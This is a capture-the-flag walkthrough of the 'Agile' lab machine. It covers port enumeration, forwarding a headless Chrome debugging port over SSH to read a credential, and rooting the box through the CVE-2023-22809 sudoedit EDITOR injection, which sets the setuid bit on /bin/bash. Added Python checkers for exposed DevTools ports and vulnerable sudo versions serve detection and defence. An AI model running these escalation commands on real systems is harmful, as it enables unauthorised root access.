2023-03-06 20:58
👀Enumeration
cat portscan.tcp
Discovered open port 22/tcp on 10.129.29.9
Discovered open port 80/tcp on 10.129.29.9
Port 80
Scan Directory
🥨Exploitation
🎶Foothold.
Move to edwards
corum@agile:~$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:5555 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN
tcp 0 444 10.129.30.83:22 10.10.16.31:44890 ESTABLISHED
tcp 0 0 127.0.0.1:41829 127.0.0.1:60810 TIME_WAIT
tcp 0 0 127.0.0.1:41829 127.0.0.1:60808 TIME_WAIT
tcp 0 0 127.0.0.1:33283 127.0.0.1:50604 TIME_WAIT
tcp 150 0 127.0.0.1:56020 127.0.0.1:3306 CLOSE_WAIT
tcp 0 0 127.0.0.1:33283 127.0.0.1:55180 TIME_WAIT
tcp 0 1 10.129.30.83:36294 8.8.8.8:53 SYN_SENT
tcp6 0 0 :::22 :::* LISTEN
corum@agile:~$ ps -ef | grep 41829
runner 17254 17248 5 12:22 ? 00:00:00 /usr/bin/google-chrome --allow-pre-commit-input --crash-dumps-dir=/tmp --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=41829 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.com.google.Chrome.hy4sbe --window-size=1420,1080 data:,
runner 17320 17269 8 12:22 ? 00:00:00 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=17261 --lang=en-US --enable-automation --enable-logging --log-level=0 --remote-debugging-port=41829 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1678072321972724 --launch-time-ticks=33000521678 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=0,i,424189539364511568,869939118205617861,131072 --disable-features=PaintHolding
corum 17333 17141 0 12:22 pts/0 00:00:00 grep --color=auto 41829
Forward the port to the local machine with ssh: ssh corum@superpass.htb -L 41829:127.0.0.1:41829
Open this page and add the URL as a target.
Then open the page, and a credential can be seen.
Log in with ssh.
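From the defender's side, the finding above (a headless Chrome exposing a DevTools remote-debugging port on loopback, discovered by correlating netstat with ps) is easy to audit automatically. The following Python is an added example, not part of the original write-up: it parses netstat -nat and ps -ef text, collects every local port seen on a loopback address in any state (the page's listener only showed up through TIME_WAIT entries, so LISTEN alone is not enough), and reports processes whose command line advertises --remote-debugging-port on one of those ports. The sample netstat and ps text is constructed for the example and modelled on the write-up's output; PIDs and ports in it are made up.

```python
import re

# Constructed sample of `netstat -nat` output (modelled on the write-up, not live data).
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5555          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:41829         127.0.0.1:60810         TIME_WAIT
tcp        0      0 127.0.0.1:41829         127.0.0.1:60808         TIME_WAIT
tcp6       0      0 :::22                   :::*                    LISTEN
"""

# Constructed sample of `ps -ef` output; PIDs and flags are made up for the example.
PS_SAMPLE = """\
UID        PID  PPID  C STIME TTY          TIME CMD
runner   17254 17248  5 12:22 ?        00:00:00 /usr/bin/google-chrome --headless --enable-automation --remote-debugging-port=41829 --user-data-dir=/tmp/.com.google.Chrome.xxxx data:,
runner   17320 17269  8 12:22 ?        00:00:00 /opt/google/chrome/chrome --type=renderer --headless --remote-debugging-port=41829
corum    17333 17141  0 12:22 pts/0    00:00:00 grep --color=auto 41829
"""

LOOPBACK_PREFIXES = ("127.", "::1")
DEBUG_PORT_RE = re.compile(r"--remote-debugging-port=(\d+)")


def loopback_ports(netstat_text):
    """Return the set of local TCP ports seen on a loopback address, in any socket state."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue  # header line or non-TCP entry
        addr, _, port = fields[3].rpartition(":")  # handles both 127.0.0.1:53 and ::1:53
        if addr.startswith(LOOPBACK_PREFIXES) and port.isdigit():
            ports.add(int(port))
    return ports


def debugging_processes(ps_text):
    """Map PID -> (user, port) for processes whose command line exposes a DevTools port."""
    found = {}
    for line in ps_text.splitlines():
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) < 8 or not fields[1].isdigit():
            continue  # header line
        match = DEBUG_PORT_RE.search(fields[7])
        if match:
            found[int(fields[1])] = (fields[0], int(match.group(1)))
    return found


def find_exposed_devtools(netstat_text, ps_text):
    """Correlate the two listings: a DevTools port that is actually in use on loopback."""
    ports = loopback_ports(netstat_text)
    hits = []
    for pid, (user, port) in sorted(debugging_processes(ps_text).items()):
        if port in ports:
            hits.append({"pid": pid, "user": user, "port": port})
    return hits


if __name__ == "__main__":
    for hit in find_exposed_devtools(NETSTAT_SAMPLE, PS_SAMPLE):
        print(f"DevTools port {hit['port']} in use by pid {hit['pid']} ({hit['user']})")
```

Any hit means a local user can reach the browser's DevTools endpoint, exactly the path the write-up follows; the fix on the host side is to keep automation browsers from exposing a debugging port at all, or to run them in a user namespace or container the rest of the system cannot reach.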
✨Privilege Escalation
🎉ROOT
After moving to the edwards user, check sudo -l
edwards@agile:~$ sudo -l
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
Searching for related vulnerabilities gives
https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/blob/main/exploit.sh
edwards@agile:/tmp$ export EDITOR='vim -- /app/venv/bin/activate'
edwards@agile:/tmp$ sudo -u dev_admin sudoedit /app/config_test.json
Add a line chmod u+s /bin/bash
After a few seconds, the s bit will be set on /bin/bash.
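The two preconditions for the escalation above are a sudo build in the CVE-2023-22809 range (1.8.0 through 1.9.12p1; 1.9.12p2 is the fix) and a sudoers rule that grants sudoedit. The following Python is an added example for checking both from a host inventory; it is not part of the write-up or of the linked exploit repository. It parses the version string the way sudo prints it (with an optional pN patch level, which a plain string comparison would get wrong) and pulls the sudoedit rules out of sudo -l output. The sudo -l text used for the test is constructed and mirrors the rule shown on the page.

```python
import re

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Affected range from the sudo advisory for CVE-2023-22809: 1.8.0 through 1.9.12p1.
FIRST_AFFECTED = (1, 8, 0, 0)
LAST_AFFECTED = (1, 9, 12, 1)


def parse_sudo_version(text):
    """Turn '1.9.12p1' or the first line of `sudo --version` into a comparable tuple.

    The patch level after 'p' becomes the fourth element (0 when absent), so
    1.9.12 < 1.9.12p1 < 1.9.12p2 compares correctly as tuples.
    """
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, micro, patch = match.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def vulnerable_to_cve_2023_22809(version_text):
    """True when the version falls inside the affected range (inclusive at both ends)."""
    return FIRST_AFFECTED <= parse_sudo_version(version_text) <= LAST_AFFECTED


def sudoedit_rules(sudo_l_output):
    """Return the `sudo -l` lines that grant sudoedit; without one the bug is unreachable."""
    return [line.strip() for line in sudo_l_output.splitlines()
            if "sudoedit" in line and not line.lstrip().startswith("User ")]


def assess_host(version_text, sudo_l_output):
    """Combine both checks into one verdict for a host."""
    rules = sudoedit_rules(sudo_l_output)
    return {
        "version": parse_sudo_version(version_text),
        "vulnerable_version": vulnerable_to_cve_2023_22809(version_text),
        "sudoedit_rules": rules,
        "exposed": vulnerable_to_cve_2023_22809(version_text) and bool(rules),
    }


# Constructed `sudo -l` output, mirroring the shape of the rule in the write-up.
SUDO_L_SAMPLE = """\
Matching Defaults entries for edwards on agile:
    env_reset, mail_badpass, use_pty

User edwards may run the following commands on agile:
    (dev_admin : dev_admin) sudoedit /app/config_test.json
"""

if __name__ == "__main__":
    # "Sudo version 1.9.9" is a constructed version line, not taken from the target.
    print(assess_host("Sudo version 1.9.9", SUDO_L_SAMPLE))
```

A host that reports exposed needs the sudo upgrade; until then, the sudo advisory's workaround is to stop sudoedit from honouring the user's editor variables by adding Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR" to sudoers.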